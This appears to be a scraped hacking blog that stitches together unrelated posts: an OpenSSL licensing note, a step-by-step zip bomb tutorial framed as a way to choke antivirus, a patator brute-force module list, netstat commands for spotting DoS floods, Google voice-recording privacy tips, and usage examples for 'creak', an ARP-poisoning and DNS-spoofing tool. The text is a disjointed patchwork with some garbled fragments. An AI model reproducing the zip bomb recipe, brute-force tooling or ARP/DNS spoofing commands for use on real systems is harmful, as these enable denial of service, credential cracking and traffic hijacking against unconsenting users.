The OpenSSL project announces a change in license from Apache-like license to Apache License 2.0 to make it easier to use free-source software projects and products. OpenSSL is the most widely used encryption library, it was previously used license is OpenSSL License and SSLeay License, which OpenSSL license is the Apache License 1.0 license, and SSLeay license is 4-clause BSD.

These two licenses are not compatible with the GPL license, and the GPL software requires an exception when using OpenSSL, and the Apache License 2.0 is compatible with the GPL. After modifying the license, OpenSSL will be more freely integrated into the GPL software. The OpenSSL project indicates that the next few days will begin sending mail to all project contributors requesting them to approve the change.

Zip Bomb and how to make one

Posted: 19/03/2017 in Uncategorized

A zip bomb, also known as a decompression bomb (or the ‘Zip of Death’ for the overly dramatic ones), is a malicious archive file designed to crash or render useless the program trying to access it. It could also be employed to disable anti-virus software, in order to create an opening for other typical viruses. Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (for example, by an anti-virus in order to scan for viruses) requires inordinate amounts of time, disk space or memory (or all of these).

The classic zip bomb is a tiny zip archive file, most are measured in kilobytes. However, when this file is unzipped it’s contents are more than what the system can handle. A typical zip bomb file can easily unpack into hundreds of gigabytes of garbage data and more advanced ones can go up to petabytes (millions of gigabytes) or even exabytes (billions of gigabytes). Yes, to be perfectly clear we are indeed talking about stuffing exabytes of data into kilobytes.

To understand how it works, we have to take a little detour to see how data compression works (WinZip, WinRAR, 7-zip etc.)

What is compression?

Compression is a reduction in the number of bits needed to represent data. Consider the following string:

aaabbbbaaabaaabaaa

The above string is 18 characters long. Notice that the substring aaa can be found a lot of times. This is what’s known as statistical redundancy. We take the longest common sequences in data and try to represent them using as few bits as possible. Now, compressing this string means we have to represent this information in less than 18 characters. Let’s replace every occurrence of ‘aaa’ with a symbol, say ‘$’ and see what happens. Instead of using the string directly, we use an intermediate (compressed) form of the string along with some instructions on how to get the original string:

$bbbb$b$b$

$=aaa

The first line is supposed to be our compressed data and the second line is the instruction, a dictionary that we’ve created which tells us that when we want to decompress the data we should replace every occurrence of $ with aaa to get back the original data. Now if you count the total number of characters, we only need 10 + 5 = 15 to represent the same information. Compression just happened.

Now this was a very crude example and our little ‘algorithm’ ignored a lot of things that a practical compression algorithm (such as Huffman coding or LZW) needs. But it’ll do for our purposes.

If you often use compression applications like WinZip or WinRar you’ll notice that sometimes your data compresses very well, while other times compression hardly reduces the size of the data. The real takeaway is that compression thrives when the data has some repeating patterns (i.e., statistical redundancy). As an example, when compressing text we can use the knowledge that the letter e is the most common letter in modern English. So, it’d be worth our while to try and represent e by as few bits as possible.

Now back to zip bombs.

42.zip

No discussion on zip bombs is complete without the infamous 42.zip. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3 gigabyte (4.3×109 bytes) file for a total of 4.5 petabytes (4.5×1015 bytes) of uncompressed data.

The 42.zip is just one example, there are many more like this and you can create your own. The principal of zip bombs extends to many other areas. A similar file is an XML-based decompression bomb called “billion laughs” (or XML Bomb). Basically it crashes a web browser by causing the XML parser to run out of memory. Most web browsers today defend against this by capping the memory allocated to the parser.

4.5 petabytes is pretty impressive, but what we’re about to do is going to blow this out of the water. We are going to build an exabyte zip bomb.

How to make a zip bomb

Let’s take a look at how to create your very own zip bomb. It’s pretty easy.

  • Open up a text editor
  • Start typing zeros (0). A lot of zeros. Really, just keep the button pressed. And then some more.
  • Now select the whole thing and copy and paste. And paste. And paste.
  • Rinse and repeat. You need to do the above until your text file has literally millions of zeroes. Your innocent text editor will likely begin to lag around a hundred thousand zeros, so be careful and keep going.
Notepad with thousands of zeros

Who told you to stop? Keep pasting!
  • P.S: There’s an easier shortcut. Say you make an initial text file around 10MB worth of zeros. Save it and close your text editor. Go to the folder where your text file is stored, make around ten copies of the text file in the same folder. Now open up a command prompt where your text file is stored and type:
    copy /b *.txt combined.txt
    

    What this does is combine all the copies of the text files into one. Better still, it can do this quickly without any lag. Text editors freeze up because of having to deal with the user interface. Using the command line, everything happens as a background process without a hiccup. Combining ten files of 10MB will yield one 100MB file, combine ten copies of that and you have a 1GB text file full of zeros in just a few seconds.

In a standard text file, every character needs 1 byte (8 bits) of storage. So,

  • One thousand characters = 1,000 bytes (just under one kilobyte. Remember a kilobyte is 1024 bytes not 1000)
  • One million characters = 1,000,000 bytes (just under one megabyte)
  • One billion characters = 1,000,000,000 bytes (just shy of one gigabyte)

The exact size doesn’t really matter. A 1GB text file will do just fine.

  • Now, open up your compression app (any will work, WinZip, WinRar, 7-zip etc.) and compress the text file.
  • Hold on to your dropping jaw as you’ll likely see a compression rate of around 99.9% (1000 times reduction in file size), the 1 GB file would be around 1 MB compressed.
  • Now some final bit of copy-pasting is left. Make a dozen or so copies of the zip file. Now zip them.
  • Make a few copies of this new zip file and zip all the copies.
  • Keep adding more and more layers and viola! our zip bomb is ready. At 9 layers (each with 10 zipped files of the layer below), with a 1GB text file at the bottom, you’d have a total of 1 exabyte ( = 109*1GB = 1018 bytes) and the zip bomb would be a few kilobytes.

And there we go.

How is a zip bomb used?

So now that we have packed a ridiculous amount of data into one tiny file, what can be done with it? Is it just a quirky trick, interesting but useless? Yes and no.

Old compression applications used to come with a “feature” called recursive decompression. You could choose to fully unpack an archive that you knew had more archives within it. The zip bomb was actually a bomb for these applications. Even today, most common storage devices (like the hard disk in your computer) are pretty slow. So, it would take a good long while to write a large amount of data to the storage device. Anyone slowly unpacking a zip bomb would quickly notice this and simply stop the process, defusing our bomb. Most modern applications don’t use recursive decompression because of zip bombs.

In the same vein, most modern anti-virus programs can detect whether a file is a zip bomb and avoid unpacking it. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level – effectively converting their exponential growth to linear. And so the bomb is defused yet again.

If this weren’t the case, then zip bombs would still be a viable attack against anti-viruses, or at the very least a stalling technique. It’s pretty straightforward. A malicious hacker’s holy grail is to be able to run an executable file on the victim’s computer without the prying eyes of anti-viruses. Anti-viruses keep a close watch on new potentially dangerous files. So to execute a potentially dangerous file, why not distract the anti-virus with something else? This is exactly what zip bomb could do in earlier times. While the anti-virus is choking up, a malicious executable could easily steal data, install backdoors or bitcoin miners or really just anything and even whitelist these installations in the anti-virus completely owning the system.

But this technique is no longer viable. This is both good for us (as users) and bad for us (as hackers). But security is a race without a finish line. You can’t ever be sure that a system is completely secure. Even if you do find the very last security hole in a system, you’ll never be able to know that it was indeed the last security hole. All we can do is keep on looking and that leaves open the possibility that perhaps one day a new vulnerability would be found and zip bombs would come back with a bang.

 

What is patator?
It is a universal tool brute force, having on board a decent number of modules and the ability to fairly flexible settings. Patator is, as usual, a python script, management is made from cli.

Currently it supports the following modules:

* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup : Enumerate valid users using Finger
* http_fuzz : Brute-force HTTP/HTTPS
* ajp_fuzz : Brute-force AJP
* pop_login : Brute-force POP
* pop_passd : Brute-force poppassd (not POP3)
* imap_login : Brute-force IMAP
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* smb_lookupsid : Brute-force SMB SID-lookup
* rlogin_login : Brute-force rlogin
* vmauthd_login : Brute-force VMware Authentication Daemon
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* mysql_query : Brute-force MySQL queries
* rdp_login : Brute-force RDP (NLA)
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Brute-force DNS
* dns_reverse : Brute-force DNS (reverse lookup subnets)
* ike_enum : Enumerate IKE transforms
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files
* umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes

Download

root@ddos:~/Desktop# git clone https://github.com/lanjelot/patator.git

root@ddos:~/Desktop# cd patator/

root@ddos:~/Desktop/patator# python patator.py

Ytv-Linuxour server appearing pretty slow could be many things from wrong configs, scripts and dodgy hardware – but sometimes it could be because someone is flooding your server with traffic known as DoS ( Denial of Service ) or DDoS ( Distributed Denial of Service ).

Denial-of-service attack (DoS attack) or Distributed Denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. This attack generally target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. DoS attacks are implemented by either forcing the targeted computer to reset, or consuming its resources so that it can no longer provide its services or obstructs the communication media between the users and the victim so that they can no longer communicate adequately.

In this small article you’ll see how to check if your server is under attack from the Linux Terminal with the netstat command

From the man page of netstat “netstat – Print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships”

Some examples with explanation

netstat -na
This display all active Internet connections to the server and only established connections are included.

netstat -an | grep :80 | sort
Show only active Internet connections to the server on port 80, this is the http port and so it’s useful if you have a web server, and sort the results. Useful in detecting a single flood by allowing you to recognize many connections coming from one IP.

netstat -n -p|grep SYN_REC | wc -l
This command is useful to find out how many active SYNC_REC are occurring on the server. The number should be pretty low, preferably less than 5. On DoS attack incidents or mail bombs, the number can jump to pretty high. However, the value always depends on system, so a high value may be average on another server.

netstat -n -p | grep SYN_REC | sort -u
List out the all IP addresses involved instead of just count.

netstat -n -p | grep SYN_REC | awk ‘{print $5}’ | awk -F: ‘{print $1}’
List all the unique IP addresses of the node that are sending SYN_REC connection status.

netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n
Use netstat command to calculate and count the number of connections each IP address makes to the server.

netstat -anp |grep ‘tcp|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n
List count of number of connections the IPs are connected to the server using TCP or UDP protocol.

netstat -ntu | grep ESTAB | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -nr
Check on ESTABLISHED connections instead of all connections, and displays the connections count for each IP.

netstat -plan|grep :80|awk {‘print $5’}|cut -d: -f 1|sort|uniq -c|sort -nk 1
Show and list IP address and its connection count that connect to port 80 on the server. Port 80 is used mainly by HTTP web page request.

How to mitigate a DOS attack

Once that you have found the IP that are attacking your server you can use the following commands to block their connection to your server:

iptables -A INPUT 1 -s $IPADRESS -j DROP/REJECT
Please note that you have to replace $IPADRESS with the IP numbers that you have found with netstat.
After firing the above command, KILL all httpd connections to clean your system and than restart httpd service by
using the following commands:

killall -KILL httpd

service httpd start #For Red Hat systems
/etc/init/d/apache2 restart #For Debian systems

 

tv-pure google

According to The Independent, Google’s voice search function doesn’t just turn on when you ask it to. Rather, it records almost everything.

Feeling unnerved yet? Well, it gets even wilder. You see, you can listen to the recordings Google has stored and associated with your name simply by visiting this webpage.

There’s also this webpage that will show you how much Google knows about your every move on the internet.

Both webpages will contain information from not only computers but any Android device you’ve logged in to your Google account.

How to Delete the Recordings

Luckily, if you’re not too happy about Google having potentially hours of your voice in its database, you can delete those files.

Beside each file’s title you’ll see a checkbox.

google-speach

Just select the three dots top right and select delete    google-voice-delete

How to Stop Google from Recording You Again

Now, as The Independent points out, stopping Google from recording you does result in some limited functionality if you’re using an Android phone or the company’s search.

However, you may be someone whose concern for privacy is much greater than finding what you’re looking for easily. If so, begin by never using Google’s voice search functions again. Follow up by disabling Google’s voice search.

  1. Navigate to Settings
  2. Tap the General tab
  3. Under “Personal” find “Language & keyboard”
  4. Find “Google voice typing” and tap the Settings button
  5. Tap “Ok Google” Detection
  6. Under the “From the Google app” option, move the slider to the left. If Google voice is already enabled move the slider to the left of “From any screen” or “Trusted Voice” and the “From the Google app” will appear.

 

tv crime2

Recently I was asked how to deny navigation and download capabilities of a compromised machines on the local network.  Well this script by codepr performs an ARP poison attack and sending reset TCP packets to every request made to the router.

Installation

$ git clone https://github.com/coldcain/creak.git
$ cd creak
$ python setup.py install

or simply clone the repository and run the creak.py after all requirements are installed:

$ git clone https://github.com/codepr/creak.git

It is required to have installed pcap libraries for raw packet manipulations and dpkt module, for dns spoofing options is required to have installed dnet module from libdnet package, do not confuse it with pydnet (network evaluation tool) module. It can use also scapy if desired, can just be set in the config.py file.

Options

Usage: creak.py [options] dev

Options:
  -h, --help           show this help message and exit
  -1, --sessions-scan  Sessions scan mode
  -2, --dns-spoof      Dns spoofing
  -x, --spoof          Spoof mode, generate a fake MAC address to be used
                       during attack
  -m MACADDR           Mac address octet prefix (could be an entire MAC
                       address in the form AA:BB:CC:DD:EE:FF)
  -M MANUFACTURER      Manufacturer of the wireless device, for retrieving a
                       manufactur based prefix for MAC spoof
  -s SOURCE            Source ip address (e.g. a class C address like
                       192.168.1.150) usually the router address
  -t TARGET            Target ip address (e.g. a class C address like
                       192.168.1.150)
  -p PORT              Target port to shutdown
  -a HOST              Target host that will be redirect while navigating on
                       target machine
  -r REDIR             Target redirection that will be fetched instead of host
                       on the target machine
  -v, --verbose        Verbose output mode
  -d, --dotted         Dotted output mode

Example

Most basic usage: Deny all traffic to the target host

$ python creak.py -t 192.168.1.50 wlan0

Set a different gateway:

$ python creak.py -s 192.168.1.2 -t 192.168.1.50 wlan0

Set a different mac address for the device:

$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.50 wlan0

Spoof mac address generating a fake one:

$ python creak.py -x -t 192.168.1.50 wlan0

Spoof mac address generating one based on manufacturer(e.g Xeros):

$ python creak.py -x -M xeros -t 192.168.1.50 wlan0

DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz(e.g. localhost):

$ python creak.py -x -M xeros -t 192.168.1.50 -a www.ab.xy -r www.cd.xz wlan0